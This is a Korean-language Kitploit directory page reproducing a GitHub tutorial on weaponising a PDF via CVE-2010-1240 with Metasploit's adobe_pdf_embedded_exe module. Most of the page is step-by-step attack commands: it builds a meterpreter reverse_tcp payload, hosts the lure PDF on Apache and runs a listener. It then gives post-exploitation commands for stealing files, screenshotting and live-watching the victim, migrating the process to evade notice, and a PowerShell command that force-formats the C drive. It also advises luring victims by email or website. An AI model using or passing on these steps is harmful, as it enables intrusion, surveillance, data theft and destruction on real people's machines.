Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Embedded-PDF — 이 데모 비디오는 실제로 임베디드 페이로드로 구성된 무해해 보이는 PDF 파일을 대상에게 전송하여 피해자의 장치를 제어할 수 있는 방법을 보여줍니다. 이 익스플로잇은 CVE-2010-1240으로 공개되었습니다. | Kitploit
도구/GitHubGitHub/jasmoon99/embedded-pdf
Phishing ToolsPayload GenerationExploitationPost-ExploitationPenetration TestingCommand and ControlSocial EngineeringLearning & EducationRemote Access Tool
GitHubjasmoon99/embedded-pdf

Embedded-PDF

이 데모 비디오는 실제로 임베디드 페이로드로 구성된 무해해 보이는 PDF 파일을 대상에게 전송하여 피해자의 장치를 제어할 수 있는 방법을 보여줍니다. 이 익스플로잇은 CVE-2010-1240으로 공개되었습니다.

7165년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

PDF 파일을 통한 임베디드 백도어 연결 😈

제공    

소개

이 데모 비디오는 겉보기에는 무해해 보이지만 실제로는 임베디드 페이로드가 포함된 PDF 파일을 대상에게 보내 피해자의 장치를 어떻게 제어할 수 있는지 보여줍니다. 이 익스플로잇은 CVE-2010-1240으로 공개되었습니다.

PDF가 Adobe Reader에서 열리자마자, 보안 팝업에 동의하도록 속은 사용자는 리버스 TCP 연결을 통해 우리가 그들의 장치에 연결된 meterpreter 세션을 획득하게 합니다. 그때까지, 그들의 모든 데이터와 현재 하고 있는 모든 것이 우리의 감시 하에 있습니다.

Hehe~Boi

소프트웨어/도구 목록

  • Metasploit
  • Adobe Reader <= 8.1.2

환경

Kali Linux         Windows 7 or 10         Adobe Reader        

  • 공격자 머신: Kali Linux 버전 2021.1
  • 대상 OS: Windows 10 (x86) 또는 Windows 7 (x86)
  • 대상 소프트웨어: Adobe Reader 8.1.2

상세 단계

먼저, Metasploit 프레임워크에 접근하기 위한 명령줄 인터페이스를 제공하는 MSFconsole을 실행합니다.

root@kitploit:~
msfconsole

그런 다음, 대상 Windows 플랫폼 및 Adobe PDF Reader와 일치하는 익스플로잇을 검색합니다. 그러면 피해자의 Windows 머신에 침투하고 Adobe PDF Reader 취약점을 악용하는 데 사용할 수 있는 전체 익스플로잇 목록이 표시됩니다.

root@kitploit:~
search type:exploit platform:windows adobe pdf

이 익스플로잇에서는 아래 명령을 사용하여 'adobe_pdf_embedded_exe' 모듈을 선택하고 사용하여 피해자를 하이재킹하는 목표를 달성합니다.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

또한 아래와 같이 'info' 명령을 사용하여 익스플로잇의 정보를 확인할 수 있습니다.

root@kitploit:~
info

그런 다음, 리버스 TCP 연결을 사용하도록 페이로드를 설정합니다. 또한 대화형 셸을 제공하는 Meterpreter를 사용하여 코드를 삽입하고 실행함으로써 피해자의 머신을 탐색하는 다양한 기능을 쉽게 사용할 수 있습니다.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

그런 다음, 리스닝 호스트와 포트를 설정합니다. LHOST의 경우 공격자 머신의 IP 주소를 입력해야 하며, 이 경우 Kali 머신의 IP 주소(10.0.2.4)입니다.*

  • *참고*
    • 자신의 Kali 머신 IP를 사용해야 합니다
    • 다른 포트 번호를 사용할 수 있습니다

한편 LPORT는 일반적으로 사용되지 않는 포트 번호를 설정하면 됩니다.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

그런 다음 INFILENAME* 플래그를 사용하여 PDF의 기본 파일을 설정합니다. 다음으로, 피해자가 악성 PDF 파일을 열도록 관심을 끌 수 있는 파일명으로 설정합니다.

  • *참고*
    • PDF 파일 경로를 확인해야 합니다
    • 다른 파일명을 사용할 수 있습니다
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

'exploit' 명령을 입력하여 PDF와 함께 페이로드를 생성하기 전에 옵션을 다시 확인할 수 있습니다.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

PDF 파일을 생성한 후, 파일을 /var/www/html로 이동합니다. 이 디렉토리는 Kali 머신의 웹 애플리케이션 서버를 호스팅하는 곳으로, 피해자가 나중에 PDF 파일을 다운로드할 수 있도록 합니다.

  • 참고:
    • 다른 파일명을 설정한 경우 올바른 경로를 복사해야 합니다!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

그런 다음 리스너를 설정하기 위해 'exploit/multi/handler'를 사용합니다. 다시 한 번 악성 PDF 파일을 생성할 때 정의한 대로 페이로드, LHOST, LPORT를 설정합니다. 그런 다음 페이로드를 실행합니다.

  • 참고:
    • LHOST: 자신의 Kali 머신 IP 주소를 확인하세요
    • LPORT: 다른 포트 번호를 설정한 경우 올바르게 입력했는지 확인하세요
    • show info 또는 show options는 선택적으로 실행할 수 있는 명령입니다.
      • 방금 설정한 내용을 확인하기 위해 실행하는 것입니다.
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

다른 터미널에서 Apache 서버의 상태를 확인하여 /var/www/html에 있는 PDF 파일을 호스팅하고 있는지 확인합니다. 그래야 피해자가 파일을 다운로드할 수 있습니다.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Windows 머신에서 Chrome 브라우저와 같은 브라우저를 열고 Kali IP (10.0.2.4)*를 입력하여 Kali 머신의 웹 애플리케이션 서버에 접속합니다.

*참고: 자신의 Kali 머신 IP 주소를 확인하세요

그런 다음 사용자가 의도된 PDF 파일을 저장하는 시뮬레이션을 합니다.

피해자가 Adobe Reader 8.1.2에서 보안 프롬프트 메시지를 수락하며 파일을 열면, Kali 머신에서 리버스 TCP 연결을 통해 새 세션이 연결된 것을 확인할 수 있습니다.

실제 시나리오에서는 임베디드 페이로드가 포함된 PDF로 웹사이트를 설정하여 피해자가 파일을 다운로드하거나 이메일로 첨부하도록 합니다.


익스플로잇 결과

이제 피해자의 머신에 원격으로 접근하여 meterpreter 세션에서 원하는 추가 악성 행위를 수행할 수 있습니다.

우리가 할 수 있는 일 목록 표시

root@kitploit:~
help

현재 디렉토리 목록

root@kitploit:~
pwd

해당 디렉토리의 파일 목록

root@kitploit:~
ls

피해자 머신에서 폴더 또는 파일 다운로드

예를 들어 password.txt라는 파일이 있다면 download password.txt 명령을 실행할 수 있습니다.

root@kitploit:~
download [folder name | filename with extension]

피해자 머신에 파일 생성

물론, 정말 악의적이라면 Windows 머신에 계속 연결할 수 있도록 악성 스크립트(백도어 심기)를 작성할 수 있습니다! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Windows와 상호작용

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

추가

그러나 공격자는 meterpreter 세션에서 migrate 모듈을 사용하여 meterpreter 프로세스를 다른 프로세스로 마이그레이션함으로써 의심을 줄일 수 있습니다.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

여기서는 자동으로 피해자 머신에서 새로운 프로세스를 생성하여 그곳으로 마이그레이션됩니다. 그러면 피해자는 감염된 PDF 파일을 삭제할 수 있지만, 프로세스가 이미 다른 곳으로 이동했다는 사실을 전혀 인식하지 못합니다.

공격자는 명령 프롬프트(cmd) 또는 PowerShell을 사용하여 대상 머신에 악성 스크립트를 추가로 생성할 수 있으며, 이는 전체 운영 체제를 제대로 작동하지 않게 만들 수 있습니다.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

데모 비디오

Demo

도구 다운로드